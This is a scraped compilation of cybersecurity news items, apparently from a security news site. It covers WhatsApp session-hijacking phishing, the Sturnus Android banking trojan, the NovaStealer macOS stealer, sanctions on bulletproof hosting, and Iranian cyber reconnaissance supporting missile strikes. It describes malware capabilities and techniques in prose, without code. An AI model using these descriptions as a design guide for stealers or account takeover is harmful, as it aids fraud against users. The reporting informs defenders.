“Users are prompted to enter a PIN (which never leaves the device), which is used to keep the private key securely stored on X’s infrastructure. This private key can then be recovered from any device if the user knows the PIN. In addition to the private-public key pairs, there is a per-conversation key that is used to encrypt the content of the messages. The private-public key pairs are used to exchange the conversation key securely between participating users.” Fake Microsoft invites fuel voice-phishing scam Phishing Campaign Uses Entra Guest User Invites for TOAD Attacks A new phishing campaign has been observed weaponizing Microsoft Entra guest user invitations to deceive recipients into making phone calls to attackers posing as Microsoft support.

The malware campaign uses Microsoft Entra tenant invitations sent from the legitimate invites@microsoft[.]com address to bypass email filters and establish trust with targets. Jabber Zeus coder extradited to face U.S. justice Ukrainian Extradited to U.S. Faces Charges in Jabber Zeus Case A Ukrainian national believed to be a developer for the Jabber Zeus cybercrime group has been reportedly extradited from Italy to the U.S.

The man, Yuriy Igorevich Rybtsov, 41, of Donetsk, is alleged to be MrICQ (aka John Doe #3), according to a report from security journalist Brian Krebs. He is accused of handling notifications of newly compromised entities, as well as of laundering the illicit proceeds from the scheme. Another member of the group, Vyacheslav “Tank” Igorevich Penchukov, pleaded guilty to his role in two different malware schemes, Zeus and IcedID, in February 2024. Later that July, he was sentenced to 18 years and ordered to pay more than $73 million in restitution to victims.

Speaking exclusively to the BBC earlier this month, the 39-year-old described himself as a “friendly guy.” At one point, he ditched cybercrime to start a company buying and selling coal, only to be lured back into it due to business troubles and the promise of good money by becoming a ransomware affiliate. In the meantime, he has been making the most of his prison time, getting high-school diplomas and learning French and English. Penchukov also acknowledged that Russian cybercrime groups worked with security services, such as the FSB. “You can’t make friends in cybercrime, because the next day, your friends will be arrested and they will become an informant,” he was quoted as saying.

“Paranoia is a constant friend of hackers.” In a report published this month, Analyst1 researcher Anastasia Sentsova said , “the Russian state has gotten its hands dirty and set up several hacktivist groups to support its war in Ukraine.” Media Land hit with sanctions over ransomware links Russian Bulletproof Hosting Provider Media Land Sanctioned for Ransomware Ties The U.S., the U.K., and Australia have sanctioned Russian bulletproof hosting (BPH) provider Media Land and its executives , including general director Aleksandr Volosovik (aka Yalishanda), for providing services to cybercrime and ransomware groups like Evil Corp, LockBit, Black Basta, BlackSuit, and Play. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has also designated Hypercore Ltd., a front company of Aeza Group LLC (Aeza Group), along with two additional individuals and two entities that have led, materially supported, or acted for Aeza Group, including Maksim Vladimirovich Makarov, Ilya Vladislavovich Zakirov, Smart Digital Ideas DOO, and Datavice MCHJ. “These so-called bulletproof hosting service providers like Media Land provide cybercriminals essential services to aid them in attacking businesses in the United States and in allied countries,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence John K.

Hurley. In tandem, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to help internet service providers and network defenders mitigate the risks posed by BPH providers. “These providers enable malicious activities such as ransomware, phishing, malware delivery, and denial-of-service (DoS) attacks, posing an imminent and significant risk to the resilience and safety of critical systems and services,” CISA said .

Researchers reengineer PoolParty in C# Porting PoolParty from C++ to C# Cybersecurity researchers have released a C# implementation of PoolParty , a collection of process injection techniques that target Windows Thread Pools to evade endpoint detection and response (EDR) systems. PoolParty was first detailed by SafeBreach in late 2023. Its C# implementation, codenamed SharpParty by Trustwave and Stroz Friedberg, enables the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files. New macOS malware hijacks crypto apps New NovaStealer Spotted Cybersecurity researchers have detailed a new macOS stealer malware called NovaStealer that can exfiltrate wallet-related files, collect telemetry data, and replaces legit Ledger/Trezor applications with tampered copies.

“An unknown dropper fetches and runs mdriversinstall.sh, which installs a small scripts orchestrator under ~/.mdrivers and registers a LaunchAgent labeled application.com.artificialintelligence,” a security researcher who goes by the name Bruce said . “This orchestrator pulls additional scripts encoded in b64 from the C2, drops them under ~/.mdrivers/scripts, and runs them in detached screen sessions in the background. It supports updates and handles the restart of responsible screen sessions.” Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet.

The same apps and tools that make life quicker and easier can also let bad guys in. It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention. Governments try to catch hackers, and experts find secret weak spots.

But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks. I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online. Found this article interesting?

CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat

CTM360 has identified a rapidly expanding WhatsApp account-hacking campaign targeting users worldwide via a network of deceptive authentication portals and impersonation pages. The campaign, internally dubbed HackOnChat, abuses WhatsApp’s familiar web interface, using social engineering tactics to trick users into compromising their accounts. Investigators identified thousands of malicious URLs being hosted on inexpensive top-level domains and rapidly generated through modern website-building platforms, allowing attackers to deploy new pages at scale. The campaign’s activity logs show hundreds of incidents in recent weeks, with a noticeable surge across the Middle East and Asia.

Read the full report here: https://www.ctm360.com/reports/hackonchat-unmasking-the-whatsapp-hacking-scam The hacking operations and the exploitation techniques Two techniques dominate these hacking operations. The Session Hijacking , where threat actors misuse the linked-device functionality to hijack active WhatsApp Web sessions, and Account Takeover , which involves deceiving victims into surrendering authentication keys, granting attackers full control of their accounts. Attackers push these links using templates of fake security alerts, WhatsApp Web lookalike portals, and spoofed group-invite messages. These sites are further optimized for global reach, featuring multilingual support and a country-code selector that adapts the interface for users across multiple regions.

Once scammers gain control of a WhatsApp account, they exploit it to target the victim’s contacts, often requesting money or sensitive information under the guise of a trusted source. They may also sift through messages, media, and documents to steal personal, financial, or private data, which can be used for fraud, impersonation, or extortion. Frequently, these attacks extend further as the compromised account is used to send phishing messages to the victim’s contacts, creating a chain of attacks that spreads the scam. HackOnChat demonstrates that social engineering remains one of the most scalable attack vectors today, especially when attackers exploit trusted and familiar interfaces and the human trust built around them.

Read the full report here and explore all of CTM360’s latest insights and threat intelligence. Learn more at www.ctm360.com Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices

Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud. “A key differentiator is its ability to bypass encrypted messaging,” ThreatFabric said in a report shared with The Hacker News. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.” Another notable feature is its ability to stage overlay attacks by serving fake login screens atop banking apps to capture victims’ credentials. According to the Dutch mobile security company, Sturnus is privately operated and is currently assessed to be in the evaluation stage.

Artifacts distributing the banking malware are listed below - Google Chrome (“com.klivkfbky.izaybebnx”) Preemix Box (“com.uvxuthoq.noscjahae”) The malware has been designed to specifically single out financial institutions across Southern and Central Europe with region-specific overlays. The name Sturnus is a nod to its use of a mixed communication pattern blending plaintext, AES, and RSA, with ThreatFabric likening it to the European starling (binomial name: Sturnus vulgaris), which incorporates a variety of whistles and is known to be a vocal mimic. The trojan, once launched, contacts a remote server over WebSocket and HTTP channels to register the device and receive encrypted payloads in return. It also establishes a WebSocket channel to allow the threat actors to interact with the compromised Android device during Virtual Network Computing (VNC) sessions.

Besides serving fake overlays for banking apps, Sturnus is also capable of abusing Android’s accessibility services to capture keystrokes and record user interface (UI) interactions. As soon as an overlay for a bank is served to the victim and the credentials are harvested, the overlay for that specific target is disabled so as not to arouse the user’s suspicion. Furthermore, it can display a full-screen overlay that blocks all visual feedback and mimics the Android operating system update screen to give the impression to the user that software updates are in progress, when, in reality, it allows malicious actions to be carried out in the background. Some of the malware’s other features include support for monitoring device activity, as well as leveraging accessibility services to gather chat contents from Signal, Telegram, and WhatsApp when they are opened by the victim, and send details about every visible interface element on the screen.

This allows the attackers to reconstruct the layout at their end and remotely issue actions related to clicks, text input, scrolling, app launches, permission confirmations, and even enable a black screen overlay. An alternate remote control mechanism packed into Sturnus uses the system’s display-capture framework to mirror the device screen in real-time. “Whenever the user navigates to settings screens that could disable its administrator status, the malware detects the attempt through accessibility monitoring, identifies relevant controls, and automatically navigates away from the page to interrupt the user,” ThreatFabric said. “Until its administrator rights are manually revoked, both ordinary uninstallation and removal through tools like ADB are blocked, giving the malware strong protection against cleanup attempts.” The extensive environment monitoring capabilities make it possible to collect sensor information, network conditions, hardware data, and an inventory of installed apps.

This device profile serves as a continuous feedback loop, helping attackers adapt their tactics to sidestep detection. “Although the spread remains limited at this stage, the combination of targeted geography and high-value application focus implies that the attackers are refining their tooling ahead of broader or more coordinated operations,” ThreatFabric said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt

Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic targeting. The development is a sign that the lines between state-sponsored cyber attacks and kinetic warfare are increasingly blurring, necessitating the need for a new category of warfare, the tech giant’s threat intelligence team said in a report shared with The Hacker News. While traditional cybersecurity frameworks have treated digital and physical threats as separate domains, CJ Moses, CISO of Amazon Integrated Security, said these delineations are artificial and that nation-state threat actors are engaging in cyber reconnaissance activity to enable kinetic targeting. “These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives,” Moses added.

As an example, Amazon said it observed Imperial Kitten (aka Tortoiseshell), a hacking group assessed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), conducting digital reconnaissance between December 2021 and January 2024, targeting a ship’s Automatic Identification System (AIS) platform with the goal of gaining access to critical shipping infrastructure. Subsequently, the threat actor was identified as attacking additional maritime vessel platforms, in one case even gaining access to CCTV cameras fitted on a maritime vessel that provided real-time visual intelligence. The attack progressed to a targeted intelligence gathering phase on January 27, 2024, when Imperial Kitten carried out targeted searches for AIS location data for a specific shipping vessel. Merely days later, that same vessel was targeted by an unsuccessful missile strike carried out by Iranian-backed Houthi militants .

The Houthi forces have been attributed to a string of missile attacks targeting commercial shipping in the Red Sea in support of the Palestinian militant group Hamas in its war with Israel. On February 1, 2024, the Houthi movement in Yemen claimed it had struck a U.S. merchant ship named KOI with “several appropriate naval missiles.” “This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure – a critical component of global commerce and military logistics,” Moses said. Another case study concerns MuddyWater, a threat actor linked to Iran’s Ministry of Intelligence and Security (MOIS), that established infrastructure for a cyber network operation in May 2025, and later used that server a month later to access another compromised server containing live CCTV streams from Jerusalem to gather real-time visual intelligence of potential targets.

On June 23, 2025, around the time Iran launched widespread missile attacks against the city, the Israel National Cyber Directorate disclosed that “Iranians have been trying to connect to cameras to understand what happened and where their missiles hit to improve their precision.” To pull off these multi-layered attacks, the threat actors are said to have routed their traffic through anonymizing VPN services to obscure their true origins and complicate attribution efforts. The findings serve to highlight that espionage-focused attacks can ultimately be a launchpad for kinetic targeting. “Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks,” Amazon said. “This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.” Found this article interesting?